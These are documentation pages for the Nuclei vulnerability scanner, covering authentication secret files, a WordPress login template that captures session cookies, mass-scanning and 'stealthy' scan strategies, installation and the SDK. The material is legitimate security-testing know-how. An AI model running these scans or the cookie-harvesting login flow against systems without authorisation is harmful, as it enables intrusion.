## Secret File Formats
YAML format of Secret File as of **Nuclei v3.2.0**:
```yaml
# static secrets
static:
# 1. Basic Auth based auth
- type: basicauth
domains:
- scanme.sh
username: test
password: test
# 2. API Key (via query parameters) based auth
- type: query
domains:
- example.com
params:
- key: token
value: 1a2b3c4d5e6f7g8h9i0j
# 3. Bearer Token based auth
- type: bearertoken
domains-regex:
- .*scanme.sh
- .*pdtm.sh
token: test
# 4. Custom Header based auth
- type: header
domains:
- api.projectdiscovery.io
- cve.projectdiscovery.io
- chaos.projectdiscovery.io
headers:
- key: x-pdcp-key
value:
# 5. Cookie based auth
- type: cookie
domains:
- scanme.sh
cookies:
- key: PHPSESSID
value: 1a2b3c4d5e6f7g8h9i0j
# raw: "PHPSESSID=1a2b3c4d5e6f7g8h9i0j" (an alternative way to specify cookie value)
# dynamic secrets
dynamic:
# A example dynamic login of Wordpress using REST API
- template: /path/to/wordpress-login.yaml
variables:
- key: username
value: pdteam
- key: password
value: nuclei-fuzz
input: auth-server.projectdiscovery.io # optional input/target, not required if target is hardcoded in template
# once login is successful, this can be used in below templatized static secret
type: cookie
domains:
- .*wp.*projectdiscovery.io
cookies:
- raw: "{{wp-global-cookie}}"
- raw: "{{wp-admin-cookie}}"
- raw: "{{wp-plugin-cookie}}"
# Note: This here (^) is a static secret in a templatized form
# so it can be any of the static secret type and not limited to just `cookie`.
```
## Secret File Fields
Here's a brief explaination of each field in the secret file:
### `type`
This field specifies the type of static secret being used and determines where the secret should be updated in the request. The following types are supported:
* `basicauth`: Basic Authentication
* `query`: Query Parameters
* `bearertoken`: Bearer Token
* `header`: Custom Header
* `cookie`: Cookie
### `domains`
This field is used to specify the domains for which the secret should be used. If the target domain matches any of the domains specified here, the secret will be used for that target. This field is mutually exclusive with `domains-regex` and can be used to limit the scope of a secret to a particular set of targets.
Example:
```yaml
domains:
- scanme.sh
- example.com
```
### `domains-regex`
This field is used to specify the domains for which the secret should be used using regex. If the target domain matches any of the regex specified here, the secret will be used for that target. This field is mutually exclusive with `domains` and can be used to limit the scope of a secret to a particular set of targets.
Example:
```yaml
domains-regex:
- .*projectdiscovery.io
- .*pdtm.sh
```
### `username` & `password`
These fields are used to specify the username and password for Basic Authentication and can only be used with `type: basicauth`.
Example:
```yaml
type: basicauth
domains:
- scanme.sh
username: test
password: test
```
### `params`
Params is a list of key-value pairs that are used to specify the query parameters for the request. This field can only be used with `type: query`.
Example:
```yaml
type: query
domains:
- example.com
params:
- key: token
value: 1a2b3c4d5e6f7g8h9i0j
```
### `token`
This field is used to specify the Bearer Token for the request and can only be used with `type: bearertoken`.
Example:
```yaml
type: bearertoken
domains-regex:
- .*scanme.sh
- .*pdtm.sh
token: 6f7g8h9i0j1a2b3c4d5e
```
### `headers`
Headers is a list of key-value pairs that are used to specify the custom headers for the request. This field can only be used with `type: header`.
Example:
```yaml
type: header
domains:
- api.projectdiscovery.io
- cve.projectdiscovery.io
- chaos.projectdiscovery.io
headers:
- key: x-pdcp-key
value:
```
### `cookies`
Cookies is a list of key-value pairs that are used to specify the cookies for the request. This field can only be used with `type: cookie`.
Example:
```yaml
type: cookie
domains:
- scanme.sh
cookies:
- key: PHPSESSID
value: 1a2b3c4d5e6f7g8h9i0j
# raw: "PHPSESSID=1a2b3c4d5e6f7g8h9i0j" (an alternative way to specify cookie value)
```
### `template`
`template` contains the absolute or relative path (of nuclei-templates directory) to the template file that will be used to authenticate with the target. This field can only be used with `type: dynamic`.
A template used for dynamic authentication should accept `variables` and optionally `input` as input, and should return the session data via extractor. The session data can then be used in the static secret.
Example:
In this example, a username and password are used to login to a Wordpress instance using REST API and the session data is exported via extractors.
```yaml
id: wordpress-login
info:
name: WordPress Login
author: pdteam
severity: info
description: |
WordPress Login template to use in workflows for authenticated wordpress testing.
tags: wordpress,login
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- '/wp-admin'
- 'wordpress_logged_in'
condition: and
extractors:
- type: regex
name: wp-plugin-cookie
part: header
internal: true
regex:
- "Set-Cookie: .+?; path=/wp-content/plugins; HttpOnly"
- type: regex
name: wp-admin-cookie
part: header
internal: true
regex:
- "Set-Cookie: .+?; path=/wp-admin; HttpOnly"
- type: regex
name: wp-global-cookie
part: header
internal: true
regex:
- "Set-Cookie: .+?; path=/; HttpOnly"
```
### `variables`
`variables` is a list of key-value pairs that are used to specify the variables for the template. This field can only be used with `type: dynamic` and is only required if the template requires variables.
Example:
```yaml
variables:
- key: username
value: pdteam
- key: password
value: nuclei-fuzz
```
### `input`
`input` is a optional input/target for the template to be executed on and is only required if the target is not hardcoded in the template. Specifying `input` here allows easy switching of dev and prod environments easily compared to hardcoding the target in the template.
Example:
```yaml
input: auth-server.projectdiscovery.io
```
# Nuclei FAQ
Common questions and answers about Nuclei
If you have other issues to report we'd love to share those with the community. Please join our [Discord server](https://discord.gg/projectdiscovery), or reach out to us on [GitHub](https://github.com/projectdiscovery).
## General
Questions and answers on general topics for Nuclei.
Nuclei is a powerful open-source vulnerability scanner that is fast and customizable. It uses simple templates (YAML-based) that describe how to detect, prioritize, and remediate security vulnerabilities for the Nuclei scanning engine.
The two components, the [Nuclei engine](http://github.com/projectdiscovery/nuclei) - is the core of the project. It allows scripting HTTP / DNS / Network / Headless / File protocols based checks in a very simple to read-and-write YAML-based format.
The Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) - are custom-created or ready-to-use **community-contributed** vulnerability templates.
Nuclei was created to solve many of the limitations of traditional scanners, which always lacked the features to allow easy-to-write custom checks on top of their engine.
Nuclei was built with a focus on simplicity, modularity, and the ability to scale scanning for many assets.
Ultimately, we wanted to create something simple enough to be used by everyone with the complexity to integrate well with the intricacies of the modern technical stack.
Nuclei's features are implemented and tailored to allow rapid prototyping for complex security checks.
Nuclei is actively maintained and supported by ProjectDiscovery. In general, we release every two weeks and continue to refine, update, and expand Nuclei and its associated capabilities.
Our team also actively monitors for announcements about new CVEs, exploits, and other vulnerabilities to quickly provide a response to address those issues.
We recently released Nuclei v3, [read more about that release on our blog.](https://blog.projectdiscovery.io/nuclei-v3-featurefusion/)
Nuclei is open-source! The best way to support Nuclei is to contribute new templates.
In addition, we are always interested in hearing about how our community uses Nuclei to solve unique security problems and would love to discuss more.
If you want to share the process of a solution you found in walk-through on our blog, we are happy to publish your guest post on the [ProjectDiscovery blog](https://blog.projectdiscovery.io).
Review more details about the project [through GitHub](https://github.com/projectdiscovery/nuclei-templates) or [reach out to us on Discord.](https://discord.com/servers/projectdiscovery-community-695645237418131507)
## Usage
Question and answers about using Nuclei.
Nuclei can be installed with several different options including: Go, Brew, and Dccoker. Check out [the Nuclei install page](/tools/nuclei/install) for details on all of the options.
Nuclei supports the following type of modules.
* [HTTP](/templates/protocols/http/)
* [DNS](/templates/protocols/dns/)
* [TCP](/templates/protocols/network/)
* [HEADLESS](/templates/protocols/headless/)
* [JAVASCRIPT](/templates/protocols/javascript/)
* [CODE](/templates/protocols/code/)
* [FILE](/templates/protocols/file/)
Nuclei can detect security vulnerabilities in **Web Applications**, **Networks**, **DNS** based misconfiguration, and **Secrets scanning** in source code or in files on the local file system.
In addition, you can now connect your Nuclei setup to ProjectDiscovery Cloud Platform (PDCP) to view your scans. [Check out more information](/cloud/introduction) on PDCP Free and our upcoming Teams release.
To learn more about Nuclei templates, check out [the GitHub repository](https://github.com/projectdiscovery/nuclei-templates), or and [explore additional documentation here](templates/introduction).
After detecting a security issue **we always recommend that you validate it a second time** before reporting it.
**To validate:**
If you have both a vulnerable target and template, rerun the template with `-debug` flag to inspect the output against the expected matcher defined in the template. Use this to confirm the identified vulnerability.
Once you confirm the result, report it!
By default, Nuclei will make several thousand requests (both HTTP protocol and other services) against a single target when running **all nuclei-templates**.
This is the result of running over 3500 templates (*with an active and growing template library*).
By default, [the following templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore) are excluded from default scans.
We consider two factors for “safety” within the context of Nuclei.
* The traffic Nuclei creates against the target
* The impact templates have on the target
**Traffic**
Nuclei usually makes fewer HTTP requests than the number of templates selected for a scan due to its intelligent request reduction.
While some templates contain multiple requests, this rule holds true across most scan configurations.
**Templates**
The library of Nuclei templates houses a variety of templates which perform fuzzing and other actions which may result in a DoS against the target system ([see the list here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore)).
To ensure these templates are not run accidentally they are tagged and excluded from the default scan. These templates can be only executed when explicitly invoked using the `-itags` option.
Nuclei is an open-source project distributed under the [MIT License](https://github.com/projectdiscovery/nuclei/blob/master/LICENSE.md).
Please join our [Discord server](https://discord.gg/projectdiscovery), or contact us via [Twitter](http://twitter.com/pdnuclei).
## Troubleshooting
Questions and answers about troubleshooting scenarios for Nuclei.
Nuclei uses templates to scan for potential vulnerabilities. These templates are files that contain information on identifying certain types of vulnerabilities.
Think of the templates as a building blueprint. On its own a blueprint cannot cause harm, as it only describes how a building or construct (in this example, a vulnerability) can be built or identified.
**For example:**
* `Webshell.Generic.118` is a template to check for the vulnerability CVE-2017-12615, which is a specific vulnerability in some versions of Apache Tomcat.
* `Backdoor.Generic.LinuxTsunami` is a template that can identify the infamous Linux Tsunami backdoor if it were present on a system.
* `kingdee-erp-rce.yaml` is a template designed to identify a remote code execution vulnerability in Kingdee ERP software.
These files are being flagged as **malware** by anti-malware solutions because they contain patterns that match known vulnerabilities.
It's similar to a textbook on viruses being detected as an actual virus.
Remember, these templates can't "harm" your computer, they are not executing any malicious code on your system.
However, if used as part of a vulnerability scanning process against an insecure system, they could help identify weaknesses.
Headless mode on machines based on Linux (OS or containers, eg. Docker) might face runtime errors due to missing dependencies related to specific OS-shared libraries used by chrome binary.
Usually, these errors can be fixed by pre-installing the browser on the specific distribution. Here is a list of the steps needed for the most common distributions.
Ubuntu
With snap:
```sh
sudo snap install chromium
```
Without snap:
```sh
sudo apt update
sudo snap refresh
sudo apt install zip curl wget git
sudo snap install golang --classic
wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add -
sudo sh -c 'echo "deb http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list'
sudo apt update
sudo apt install google-chrome-stable
```
In case you are unable to install the browser, or want to install only the minimum required dependencies, run the following command:
```
sudo apt-get install libnss3 libgconf-2-4
```
If you encounter an error similar to "libnss3.so: cannot open shared object file: No such file or directory," try running the following command to install the dev version:
```
sudo apt-get install libnss3-dev
```
Error type examples:
```
Error: Expected nil, but got: &errors.errorString{s:"[launcher] Failed to launch the browser, the doc might help https://go-rod.github.io/#/compatibility?id=os: /root/.cache/rod/browser/chromium-1018003/chrome-linux/chrome: error while loading shared libraries: libnss3.so: cannot open shared object file: No such file or directory\n"}
```
```
could not create browser
```
```
Command '/usr/bin/chromium-browser' requires the chromium snap to be installed.
Please install it with:
snap install chromium
```
## Other FAQs
Check out the [Nuclei Template FAQ](/templates/faq) for more questions and answers about templates.
# Supported Input Formats
Learn about supported input formats in Nuclei and how to use them
Input Formats supported by Nuclei can be grouped into two categories:
* **List Type**: Input formats that can be specified as a list of items (ex: URLs, IPs, CIDRs, ASN, etc.)
* **Http Request Type**: Input formats that contain a complete HTTP request and cannot be expressed as a list of items (ex: OpenAPI Schema, Proxify Traffic Logs, etc.)
### List Type
List type formats can be specified in the following ways:
1. **`-u` flag**:
Comma Separated list of values (ex: `-u scanme.sh,127.0.0.1,AS1337,192.168.1.0/24`)
2. **`-l` flag**:
File containing list of values (ex: `-l urls.txt`)
3. **via stdin (or pipe)**:
List of values can be passed via stdin (ex: `cat urls.txt | nuclei`) or piped from other tools (ex: `mytool | nuclei`)
The following are the list type formats supported by Nuclei:
* **URLs**: A URL, for example `https://projectdiscover.io`
* **IPs**: Ipv4 or Ipv6 address, for example `127.0.0.1` or `2001:0db8:85a3:0000:0000:8a2e:0370:7334`
* **CIDRs**: CIDR range, for example `192.168.1.0/24`
* **ASNs**: Autonomous System Number, for example `AS1337`
* **Domains**: Domain or Subdomain name, for example `projectdiscovery.io`
### HTTP Request Type
Due to nature of these formats, they can only be specified via file using `-l` flag and the format of the file needs to be passed via `-input-mode` flag
```
nuclei -l [format-file] -input-mode [format]
```
These formats can be classified into two types based on their usage:
* **API Specification**:
Companies/Developers write API specification for their **RESTful APIs** in various formats with standard being **OpenAPI**. These specifications are used for multiple purposes like documentation, testing, code generation etc.
**Nuclei with v3.2.0** uses these specifications to generate HTTP requests and test them against the target.
Nuclei supports **OpenAPI** and **Swagger** specifications but other formats like postman can be converted to OpenAPI formats and used with nuclei.
For example, using **OpenAPI** schema in nuclei is as simple as:
```
nuclei -l openapi.yaml -im openapi
```
Nuclei also does extra validations when generating requests and accepts inputs and variables when generating requests. Refer tp [openapi-validations](#openapi-validation) for more details.
* **Request-Response Logs generated by applications**
Many applications generate logs of requests and responses for debugging and monitoring purposes. These logs can be used by Nuclei to find vulnerabilities in the application.
Nuclei supports many popular formats WakeLockSentinel
* **Burp Suite Saved Items**: One can export request response items from burp suite in xml format and use it with Nuclei.
* **Proxify Traffic Logs**: [Proxify](https://github.com/projectdiscovery/proxify) by ProjectDiscovery exports logs in **JSONL** or **YAML-MultiDoc** format which are supported by nuclei.
**Others**:
Output of any application that either exports logs or can be converted to logs in `JSONL` or `YAML-MultiDoc` specification of Proxify can be used with Nuclei.
This means output of tools like [Katana](/tools/katana/) , [Httpx](/tools/httpx/) etc. can be used with nuclei.
If you want to add support for a new format, please create a Pull Request to [nuclei](https://github.com/projectdiscovery/nuclei).
### OpenAPI Validation
When generating requests from an OpenAPI schema, Nuclei performs validations to ensure that the generated requests are valid and prompts for missing inputs and variables.
```bash
nuclei -h target-format
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
```
* **`-ro` flag**:
Parameters defined in OpenAPI schema can be optional or required. When `-ro` flag is used, Nuclei will only use required parameters and ignore optional parameters.
* **`-sfv` flag**:
When `-sfv` flag is used, nuclei will skip any and all requests that have missing parameters
**Default Behavior**:
* **Missing Auth**:
If a given OpenAPI schema requires authentication, Nuclei will exit with missing parameters required for auth. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[FTL] openapi: missing global auth parameter: X-API-Key
```
These missing parameters can be passed using `-vars` flag. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -vars "X-API-Key=123"
```
* **Missing Required Variables**:
By default, when Nuclei finds a request with optional parameters, if available it uses them or skips those parameters. For missing required parameters, Nuclei will halt with an error. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -V "X-API-Key=23"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[ERR] openapi: Found 3 missing parameters, use -skip-format-validation flag to skip requests or update missing parameters generated in required_openapi_params.yaml file,you can also specify these vars using -var flag in (key=value) format
```
If the same command is run with `-v` flag (verbose mode), Nuclei will also log skipped optional parameters. For example:
```bash
./nuclei -l rest-openapi.yaml -im openapi -V "X-API-Key=23"
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.2.0
projectdiscovery.io
[VER] openapi: skipping optional param (scan_ids) in (query) in request [GET] /results/filters due to missing value (scan_ids)
[VER] openapi: skipping optional param (severity) in (query) in request [GET] /results/filters due to missing value (severity)
...
[VER] openapi: skipping optional param (template) in (query) in request [GET] /results/filters due to missing value (template)
[VER] openapi: skipping optional param (host) in (query) in request [GET] /results/filters due to missing value (host)
[ERR] openapi: Found 3 missing parameters, use -skip-format-validation flag to skip requests or update missing parameters generated in required_openapi_params.yaml file,you can also specify these vars using -var flag in (key=value) format
```
These missing parameters can be passed using `-vars` flag or by **temporarily** specifiying them in auto-generated `required_openapi_params.yaml` file.
This file is generated in the current working directory when Nuclei halts due to missing parameters. Here's an example auto-generated `required_openapi_params.yaml` file
```yaml
var:
- user_id=
- id=
- ip=
# Optional parameters
# - host=
# - name=
# - not_host=
# - not_severity=
# - not_template=
# - scan_ids=
# - search=
# - severity=
# - template=
# - vuln_status=
```
One can specify these missing parameters in `required_openapi_params.yaml` file and it will be automatically picked up by Nuclei. If you prefer to specify these missing parameters using `-vars` flag, you can do so as well.
The Auto-generated `required_openapi_params.yaml` is meant for temporary use and it will be **deprecated** in next release as we move towards our goal of **ProjectDiscovery Standard Authentication Across Tools** using `secret` file
* **Placeholder Parameter Values**
When Nuclei finds any request that has optional parameters and the `-ro` flag is not used, it will use placeholder values depending on the data type of the parameter. For example:
If a parameter is of type `string` then it will use `string` as placeholder value, same goes for other known types including timestamps and datatypes.
# Installing Nuclei
Learn about how to install and get started with Nuclei
```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```
Nuclei requires the latest **GO** version to install successfully.
```bash
brew install nuclei
```
Supported in **macOS** (or Linux)
```bash
docker pull projectdiscovery/nuclei:latest
```
Docker-specific usage instructions can be found [here](./running#running-with-docker).
```bash
git clone https://github.com/projectdiscovery/nuclei.git; \
cd nuclei/cmd/nuclei; \
go build; \
mv nuclei /usr/local/bin/; \
nuclei -version;
```
Nuclei require the latest **GO** version to install successfully.
```bash
https://github.com/projectdiscovery/nuclei/releases
```
* Download the latest binary for your OS.
* Unzip the ready to run binary.
```bash
git clone https://github.com/projectdiscovery/nuclei.git
cd nuclei/helm
helm upgrade --install nuclei . -f values.yaml
```
This Helm chart creates two primary resources (intended to be configured via `values.yaml`):
* A Kubernetes CronJob to run Nuclei on a defined schedule
* An [Interactsh](https://github.com/projectdiscovery/interactsh) service for Nuclei to use
# Mass Scanning with Nuclei
Running Nuclei through the CLI on hundreds of targets
## What is **Mass Scanning?**
Mass scanning in the context of Nuclei means running the Nuclei CLI on more than 100 targets. While Nuclei works out-of-the-box for running scans on any number of targets - we recommend learning more to understand
the resource requirements for running Nuclei in different scenarios and how to properly adjust flags and options to avoid overutilization of resources and to get the best performance.
## Overutilization of Resources
If flags and available options are not properly configured, Nuclei can overutilize resources and can cause following issues:
* OOM Killed by the system
* Hangs and crashes
* Error code 137 etc
## Understanding How Nuclei Consumes Resources
Nuclei is a highly concurrent tool that has major Network I/O due to nature of the tool. There is a direct correlation between concurrency and memory usage.
**max-requests**
`max-requests` is a metadata field under info section of template that contains maximum number of outgoing requests this template can make.
**Below are some flags and options that directly affect the resource utilization of Nuclei:**
* **-c or -concurrency**
This flag controls concurrency/parallelism of two components/operations in Nuclei and its default value is 25.
1. Number of templates to run in parallel at a time (IN Template-Spray/Default mode/strategy)
Number of templates to run in parallel per target (IN Host-Spray mode/strategy)
2. Number of Requests to send in parallel per template
Ex: Some template have `payloads` field in template and usually sends multiple requests. This concurrency per template is controlled by `threads: 10` value in template
But if `threads` is not defined or missing (since it is optional), then nuclei will use `-c` value to decide concurrency of requests per template
* **-bs or -bulk-size**
This flag controls concurrency/parallelism of targets in Nuclei and its default value is 25.
IN Host-Spray mode/strategy, this flag controls maximum number of targets to run in parallel at a time
IN Template-Spray/Default mode/strategy, this flag controls maximum number of targets to run in parallel for each template
* **-hbs and -headc**
`-hbs` (-headless-bulk-size) and `-headc` (-headless-concurrency) flags are variants of `-bs` and `-c` flags specifically for headless templates since headless templates are resource intensive and run a headless browser in background.
* **-jsc or -js-concurrency**
(Introduced in v3.1.8) This flag controls maximum number of javascript runtimes to run in parallel at a time. Javascript runtimes are used in templates with `flow` field and javascript protocol
Although javascript templates are few compared to http templates, but this provides a way to control the resource utilization of javascript templates.
Default value of this flag is 120 and is tested to be optimal with minimal resource utilization (Note: Nuclei by default reuses javascript runtimes to avoid overhead of creating new runtimes for each request)
* **-pc or -payload-concurrency**
(Introduced in v3.2.0) This flag controls maximum number of payloads to run in parallel for each template. This flag is only applicable to templates with `payloads` field and does not have `threads` field set, default of this flag is 25 and can be updated as per requirement
* **-rl or -rate-limit**
This flag controls the global rate limit of http requests in nuclei and its default value is 150 requests per second.
Note: Setting Low/Very Low value of this flag directly affects speed (RPS) and Memory Usage of Nuclei since ratelimit is applied just before sending requests but at this point the requests are already prepared and are in memory waiting to be sent
* **-rlm or -rate-limit-minute**
Alternative to `-rl` flag, this flag controls the global rate limit of http requests in nuclei but in terms of requests per minute (Not used as default and is mutually exclusive with `-rl` flag)
* **-ss or -scan-strategy**
This flag controls the strategy of scanning targets and its default value is `auto`
1. `auto` is currently a placeholder for `template-spray` strategy
2. `template-spray` strategy can be understood as stealthy mode of scanning and does not aggressively scan a single target. Instead of running all templates on single target it runs a template on multiple targets thereby reducing the load on single target without compromising the speed of scanning
3. `host-spray` strategy can be understood as more of a focused mode of scanning where it runs all templates on single target before moving to next target
Although difference might not seem significant but in reality this plays a major role in resource utilization and speed of scanning. Ex: `template-spray` strategy is more stealthy but consumes more memory than `host-spray` since input/target chunk is different for each template contrary to `host-spray` strategy where input/target chunk is same for all templates
This flag only decides strategy of scanning and uses concurrency specified by `-c` and `-bs` flags
**Note**: `host-spray` strategy currently does not support resume feature due to complexity of implementation
* **-rsr or -response-size-read**
This flag controls the maximum response size of http response that nuclei should read and its default value is 4MB (max).
Ex: If a endpoint/targets returns a response of 100MB(a zip file or something) then nuclei will only read first 4MB of response to avoid DOS as data read is stored in memory
This plays a major role in Memory Usage of Nuclei because at any moment heap memory of Nuclei is `1-1.5x x (concurrency * response-size-read)`
* **-stream**
Instead of probing all input urls and then proceeding with scan (default behavior), this flag continiously stream inputs to nuclei instead of waiting for probe to finish
It was observed that this flag may lead to high memory usage when running in `template-spray` strategy as there is a Marshal/Unmarshal overhead is involved and each template has different copy of input/target chunk
## Recommendations for Optimizing Resource Usage
Currently, here is no out-of-the-box solution to optimize Nuclei automatically for mass scanning. Understanding the proper use of flags and options can help in optimizing Nuclei for mass scanning.
In general, here are some recommendations to optimize Nuclei for mass scanning:
* Prefer `host-spray` strategy when possible
* Do not constraint GC (Garbage Collection) by setting low memory limits if possible. Nuclei (just like go standard http library) focuses on reusing memory than freeing it and allocating it again. This is why Nuclei like other Go tools does not have high fluctuation in memory usage and either increases or decreases memory usage gradually
* Properly adjust `-c` , `-bs` and `-rl` flags after understanding requirement and capabilities of your own system as well as targets you are scanning
* Although Nuclei can handle any number of targets we recommended batching targets based on targets or system capabilities
## Feature-based Optimizations for Mass Scanning
* **-timeout**
Timeout controls the maximum time Nuclei should wait for a response (current default is 10 sec for http 6 \* -timout value for code protocol)
This flag depends on your targets and the network conditions. Setting a low value might cause false negatives and setting a high value might cause high memory usage and slow down the scanning process.
* **-retries**
Retries controls the maximum number of retries Nuclei should attempt for a request (current default is 1)
This flag is useful when you are scanning targets with unstable network conditions. Setting a high value might cause high memory usage and slow down the scanning process.
* **-mhe or -max-host-error**
This flag controls the maximum number of (network type) errors to allow per host before removing the unresponsive host from the scan (current default is 30)
* **-nmhe or -no-max-host-error**
This flag disables the behavior of removing unresponsive hosts from the scan when they reach maximum number of errors (current default is 30)
Note: This flag directly affects the speed and memory usage of Nuclei since it keeps unresponsive hosts in memory and retries them.
## Reporting Performance Issues
Unlike other type of issues, Performance Issue require more information and a different kind of information to debug and fix this issue. Hence it is recommended to report performance issues with following information:
* Nuclei Version (if not latest then try with latest version)
* System Information (OS, Memory, CPU)
* Target Count and Template Count
* Above mentioned flags and options used especially -c, -bs, -rl, -ss
* Any other flags and options used
Above information will help in understanding if the issue is due to misconfiguration or due to a bug in nuclei. If Issue is of a more complex nature like memory leak then application profiles need to be collected and shared in the issue description
Profiling can be enabled in nuclei using `PPROF=1` environment variable and also accepts addition option `PPROF_TIME=10s` using these two env variables will enable profiling and snapshot of cpu profile and memory profile will be collected and store in appropriate directories every 10 seconds(PPROF\_TIME). For addition options about profiling refer to [nuclei-pprof](https://github.com/projectdiscovery/utils/tree/main/pprof).
A good example of reporting performance issue like memory leak is [#4552](https://github.com/projectdiscovery/nuclei/issues/4552) .
## Maximize Your Nuclei Experience with PDCP
Building a Nuclei automation or running recurrent scans on more than 100 targets can be a challenging task without understanding Nuclei and experimenting with the flags and options.
One additional option is to consider evaluating ProjectDiscovery Cloud Platform or [PDCP](https://cloud.projectdiscovery.io). As a managed service it offers:
* All Scaling and Optimizations is abstracted
* Scans are distributed and requests are approriately chunked in a manner to Scale without False Negatives
PDCP includes many other helpful features for vulnerability scanning and ASM like Dashboard, Integrations, Reporting, Recurring Scans and much more
For more information on PDCP, Visit [PDCP](https://docs.projectdiscovery.io/cloud/introduction)
# Nuclei SDK
Learn more about using the Nuclei SDK
## Nuclei SDK
Nuclei is primarily built as a CLI tool and typically optimizations and options are focused on improvements to the CLI. To address the increased usage of Nuclei from Go, we have introduced a revamped Go SDK of Nuclei in [v3.0.0](https://blog.projectdiscovery.io/nuclei-v3-featurefusion/#sdk-4-all-revamped-go-sdk).
While the CLI is still the primary way to use Nuclei, additional documentation and an API reference along with examples are available at [pkg.go.dev](https://pkg.go.dev/github.com/projectdiscovery/nuclei/v3@v3.1.10/lib#section-readme).
> **Things to Note**:
>
> * Nuclei is still in active development, so breaking changes can be expected in the SDK. The team will continute to maintain the documentation to address changes as they are implementd.
> * Running Nuclei as a service may pose security risks. We recommended implementing Nuclei as a service with caution and additional security measures suited to your environment.
If you have questions, reach out to us through [Help](/help).
### Nuclei Version
Nuclei does not support an LTS version or a stable version. This is because Nuclei and templates function as a single unit and the Nuclei Engine will evolve to meet requirements and features to support writing new templates.
To ensure the best results we recommend keeping up to date with the latest version of the Nuclei SDK.
## Performance and Optimization
Optimal and resource efficient usage of the Nuclei SDK requires a thorough understanding of [How Nuclei Consumes Resources](/tools/nuclei/mass-scanning-cli#understanding-how-nuclei-consumes-resources). We also recommend understanding optimization based on multiple factors. Refer to [mass-scanning](/tools/nuclei/mass-scanning-cli) for more details on scanning for larger target quantities.
### General Suggestions for Usage
* Implement a `host-spray` strategy when possible
* Donot constraint GC (Garbage Collection) by setting low memory limits if possible. Nuclei(just like go standard http library) focuses on reusing memory than freeing it and allocating it again. This is why Nuclei, like other Go tools does not have high fluctuation in memory usage and either increases or decreases memory usage gradually
* Properly adjust `-c` , `-bs`, and `-rl` flags after understanding requirement and capabilities of your own system as well as targets you are scanning
* While Nuclei can handle any target quantity with the correct configuration, we recommended batching targets (based on target/system capabilities)
* Using Nuclei from SDK provides more control in terms of customization for what to run and how to run and we recommended a proper chunking strategy that takes all factors into account
* Since SDK still in active development, we recommend reviewing Nuclei capabilities, especially `tmplexec` and `core` package. Understanding the execution flow will give you more granular insights into how to optimize Nuclei for your use case
### Reporting Issues
After understanding all factors and optimization techniques mentioned in above linked documentation, if you are still facing performance issues like crash, memory leak etc then please report this issue with below details:
* Nuclei Version (if not latest please try with latest version before reporting)
* Target/Input Count
* Template Count
* Values of all flags mentioned in [mass-scanning](/tools/nuclei/mass-scanning-cli) documentation or actual code snippet containing the same
* Observed Memory Usage
* Type of Handler used (NucleiEngine or ThreadSafeNucleiEngine)
* Any other relevant details
For memory leak issues, debug profiles using [pprof](https://go.dev/blog/pprof) are required to properly diagnose the issue.
# Nuclei Overview
A fast and customisable vulnerability scanner powered by simple YAML-based templates
## What is **Nuclei?**
Nuclei is a fast vulnerability scanner designed to probe modern applications, infrastructure, cloud platforms, and networks, aiding in the identification and mitigation of exploitable vulnerabilities.
At its core, Nuclei uses templates—expressed as straightforward YAML files, that delineate methods for detecting, ranking, and addressing specific security flaws.
Each template delineates a possible attack route, detailing the vulnerability, its severity, priority rating, and occasionally associated exploits. This template-centric methodology ensures Nuclei not only identifies potential threats, but pinpoints exploitable vulnerabilities with tangible real-world implications.
New to scanners and Nuclei? Try it out today with a quick example through our [Getting Started](/getstarted-overview).
## What are Nuclei's features?
| Feature | Description |
| ----------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| [Extensive Template Library](#) | Nuclei offers a vast collection of community-powered templates for targeted scans of various vulnerabilities and attack vectors. |
| [Versatile Target Specification](#) | Support for various target specification options, such as URLs, IP ranges, ASN range, and file input, allowing flexibility in defining the scanning scope. |
| [Bulk Scanning](#) | Perform bulk scanning by specifying multiple targets at once, enabling efficient scanning of a large number of assets or websites. |
| [Flexible Customization](#) | Customize scanning templates to fit specific needs, allowing tailored scanning and focusing on relevant security checks. |
| [Parallel Scanning](#) | Supports parallel scanning, reducing scanning time and improving efficiency, especially for large-scale targets. |
| [Comprehensive Reporting `cloud`](#) | Generates detailed reports with actionable insights, including vulnerability details, severity levels, affected endpoints, and suggested remediation steps. |
| [Integration with CI/CD Pipelines](#) | Seamlessly integrate Nuclei into CI/CD pipelines for automated security testing as part of the development and deployment process. |
| [CI/CD Integration `cloud`](#) | Actively maintained and developed by the ProjectDiscovery team, introducing new features, bug fixes, and enhancements to provide an up-to-date scanning framework. |
| [Ticketing integration `cloud`](#) | Two-way ticketing integration with Jira, Splunk, and many others to easily remediate and retest vulnerabilities. |
| [Customizable Output Format](#) | Configure the output format of Nuclei's scan results to suit your needs, including options for JSON, YAML, and more. |
